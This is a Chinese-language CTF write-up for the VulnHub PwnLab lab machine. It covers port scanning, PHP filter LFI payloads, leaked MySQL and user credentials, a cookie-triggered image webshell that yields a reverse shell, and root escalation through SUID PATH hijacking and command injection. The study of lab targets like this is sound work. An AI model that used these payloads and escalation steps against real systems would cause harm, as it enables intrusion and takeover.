关于渗透测试:vulnhubPwnLab上传绕过Apache多后缀解析漏洞命令劫持

61次阅读

共计 13469 个字符,预计需要花费 34 分钟才能阅读完成。

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责

服务探测

┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -p- 192.168.151.29 --open                                                
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 07:50 EST
Nmap scan report for 192.168.151.29
Host is up (0.22s latency).
Not shown: 65257 closed ports, 274 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
3306/tcp  open  mysql
53955/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 94.55 seconds
                                                                                                                                                                                                                                                                                                                             
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sV -T5 -A -O 192.168.151.29 -p 80,111,3306,53955
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 07:52 EST
Nmap scan report for 192.168.151.29
Host is up (0.23s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35282/udp   status
|   100024  1          43712/tcp6  status
|   100024  1          47161/udp6  status
|_  100024  1          53955/tcp   status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 38
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolNew, LongPassword, FoundRows, SupportsTransactions, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: mT<l1J`%6|5-#fZn=&BZ
|_  Auth Plugin Name: mysql_native_password
53955/tcp open  status  1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   227.38 ms 192.168.49.1
2   227.59 ms 192.168.151.29

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.73 seconds

web

┌──(root💀kali)-[~/pg/PwnLab]
└─# python3 /root/dirsearch/dirsearch.py -e* -u http://192.168.151.29 -t 30

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492

Output File: /root/dirsearch/reports/192.168.151.29/_22-01-17_07-55-55.txt

Error Log: /root/dirsearch/logs/errors-22-01-17_07-55-55.log

Target: http://192.168.151.29/

[07:55:55] Starting:                                        
[07:57:33] 200 -    0B  - /config.php                                       
[07:57:59] 200 -  943B  - /images/                                          
[07:57:59] 301 -  317B  - /images  ->  http://192.168.151.29/images/        
[07:58:02] 200 -  332B  - /index.php/login/                                 
[07:58:02] 200 -  332B  - /index.php                                        
[07:58:09] 200 -  250B  - /login.php                                        
[07:58:59] 301 -  317B  - /upload  ->  http://192.168.151.29/upload/        
[07:59:00] 200 -   19B  - /upload.php                                       
[07:59:00] 200 -  743B  - /upload/   

跑出 4 个 php 文件,config.php,index.php,upload.php,login.php

两个文件夹 images 和 upload

rpc

┌──(root💀kali)-[~/pg/PwnLab]
└─# rpcinfo 192.168.151.29                                                                                                                               1 ⨯
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    3    tcp6      ::.0.111               portmapper superuser
    100000    4    udp6      ::.0.111               portmapper superuser
    100000    3    udp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    3    tcp       0.0.0.0.0.111          portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    udp       0.0.0.0.0.111          portmapper superuser
    100000    3    udp       0.0.0.0.0.111          portmapper superuser
    100000    2    udp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100000    3    local     /run/rpcbind.sock      portmapper superuser
    100024    1    udp       0.0.0.0.137.210        status     106
    100024    1    tcp       0.0.0.0.210.195        status     106
    100024    1    udp6      ::.184.57              status     106
    100024    1    tcp6      ::.170.192             status     106
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sSUC -p 111 192.168.151.29                                                                                                                   130 ⨯
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 08:05 EST
Nmap scan report for 192.168.151.29
Host is up (0.33s latency).

PORT    STATE         SERVICE
111/tcp open          rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35282/udp   status
|   100024  1          43712/tcp6  status
|   100024  1          47161/udp6  status
|_  100024  1          53955/tcp   status
111/udp open|filtered rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35282/udp   status
|   100024  1          43712/tcp6  status
|   100024  1          47161/udp6  status
|_  100024  1          53955/tcp   status

Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds

没什么特地有用的信息。

LFI

首页 url 格局是:

http://192.168.151.29/?page=

page 前面当初只有两个参数 login 和 uoload

应用 php 伪协定触发文件蕴含破绽。
上面 playload 读取 login 源码

http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=login

页面打印

PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==

base64 decode

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{$luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);

    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);

    $stmt->execute();
    $stmt->store_Result();

    if ($stmt->num_rows == 1)
    {$_SESSION['user'] = $luser;
        header('Location: ?page=upload');
    }
    else
    {echo "Login failed.";}
}
else
{
    ?>
    <form action=""method="POST">
    <label>Username: </label><input id="user" type="test" name="user"><br />
    <label>Password: </label><input id="pass" type="password" name="pass"><br />
    <input type="submit" name="submit" value="Login">
    </form>
    <?php
}

应用上面 playload 读取 upload 源码

http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=upload
<?php
session_start();
if (!isset($_SESSION['user'])) {die('You must be log in.'); }
?>
<html>
    <body>
        <form action=''method='post'enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
        </form>
    </body>
</html>
<?php 
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png"); 

        if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');
        }

        if(strpos($filetype,'image') === false) {die('Error 001');
        }

        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');
        }

        if(substr_count($filetype, '/')>1){die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src=\"".$uploadfile."\"><br />";} else {die('Error 4');
        }
    }
}

?>

应用上面 playload 读取 config 源码

http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=config
<?php
$server      = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

当初咱们晓得了 mysql 的账号密码,因为靶机开启了外放的 mysql 服务,咱们能够从攻击机间接连贯靶机 mysql。

mysql

没有进入 users 数据库的权限

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.243 sec)

MySQL [(none)]> use users;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'

然而有查问 users 数据库的权限

MySQL [information_schema]> show grants;
+------------------------------------------------------------------+
| Grants for root@%                                                |
+------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `Users`.* TO 'root'@'%'                          |
+------------------------------------------------------------------+
2 rows in set (0.228 sec)

查问表名和表数据

MySQL [information_schema]> select *  from tables where table_schema = 'Users';
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION   | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| def           | Users        | users      | BASE TABLE | InnoDB |      10 | Compact    |          3 |           5461 |       16384 |               0 |            0 |  10485760 |           NULL | 2016-03-17 10:17:53 | NULL        | NULL       | latin1_swedish_ci |     NULL |                |               |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
1 row in set (1.383 sec)

MySQL [information_schema]> select * from Users.users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.251 sec)

失去三组用户凭据:

kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo

下面登录当前来到上传页面,各种绕过上传失败。。。

下面同样办法查看 index.php 文件

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[<a href="/">Home</a>] [<a href="?page=login">Login</a>] [<a href="?page=upload">Upload</a>]
<hr/><br/>
<?php
    if (isset($_GET['page']))
    {include($_GET['page'].".php");
    }
    else
    {echo "Use this server to upload and share image files inside the intranet";}
?>
</center>
</body>
</html>

注意这行代码, 蕴含了一个内部用户能够管制的 cookie 值,如果这个值变成咱们的图片马就会触发文件解析破绽

include("lang/".$_COOKIE['lang']);

当时把一张图片上传,用 burpsuite 截断,把 rever_shell.php 代码藏在图片数据里,失去一张图片马:ae3c0cf901daed40d3382c6c67c15a63.jpg

应用 curl 触发蕴含 cookie,触发文件解析破绽

┌──(root💀kali)-[~/pg/PwnLab]
└─# curl -v --cookie "lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg" http://192.168.151.29/index.php
*   Trying 192.168.151.29:80...
* Connected to 192.168.151.29 (192.168.151.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: 192.168.151.29
> User-Agent: curl/7.74.0
> Accept: */*
> Cookie: lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg
> 

收到反弹 shell

└─# nc -lnvp 4242                                                                                                              130 ⨯
listening on [any] 4242 ...
connect to [192.168.49.151] from (UNKNOWN) [192.168.151.29] 38751
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
 11:03:44 up  3:17,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

提权

咱们下面拿到的用户凭据

kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo

kent 和 kane 能够通过下面的明码自在切换 bash

在 kane 拿到 local.txt

kane 的家目录下还有个 SUID:msgmike,属主是 mike

用 strings 命令查看

kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh 
QVh[[^_]
cat /home/mike/msg.txt

执行了一条cat /home/mike/msg.txt

能够通过劫持 cat 命令提权

把 /home/kane 写入 $PATH

export PATH=/home/kane:$PATH

创立一个 cat 文件,并且给予执行权限

touch /home/kane/cat
chmod +x /home/kane/cat

把上面的 shell 写进 /home/kane/cat

#!/bin/bash
bash -p

执行 /home/kane/cat 命令,提权到 mike

kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$whoami
whoami
mike

在 mike 的 home 目录里, 有一个 msg2root 文件,也是一个 SUID,属主是 root,持续用 strings 命令查看

mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root: 
/bin/echo %s >> /root/messages.txt

执行了一条 /bin/echo %s >> /root/messages.txt 命令
%s 是咱们输出的内容,因而同样能够劫持这条命令

Message for root: id & bash -p
id & bash -p
bash-4.3# id


bash-4.3# whoami
whoami
root

拿到 proof.txt

bash-4.3# more proof.txt
more proof.txt
8ae5471d5970a5...

总结

上传的利用原理解释如下:
首先 Apache 的版本号是:2.4.10,apache 的 2.4.0~2.4.29 存在一个解析破绽,见这里
此靶机的破绽利用就是应用了 Apache HTTPD 多后缀解析破绽
什么是多后缀解析破绽?
如果一个文件里有 php 代码,那么只有拜访的 url 里蕴含了 .php 后缀,那么这个文件都会被当成 php 文件解析,比方 test.php.jpg
查看这台靶机的源代码,留神这行:

$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

这里指定了上传后的文件名是源文件名的 md5 格局,后缀是白名单里容许的扩展名,所以失常状况咱们无奈绕过上传限度。
然而因为 index.php 里呈现的这一行代码

include("lang/".$_COOKIE['lang']);

这个 lang 值咱们是能够管制的(应用 curl 指定 cookie 值),当初只须要把 lang 值换成咱们的图片马,那蕴含的图片马因为在一个 php 文件外面,所以就触发了 apache 的文件解析破绽,被当成了 php 代码执行。
概念代码如下

<?php
include('evil.jpg');
?>

正文完
 0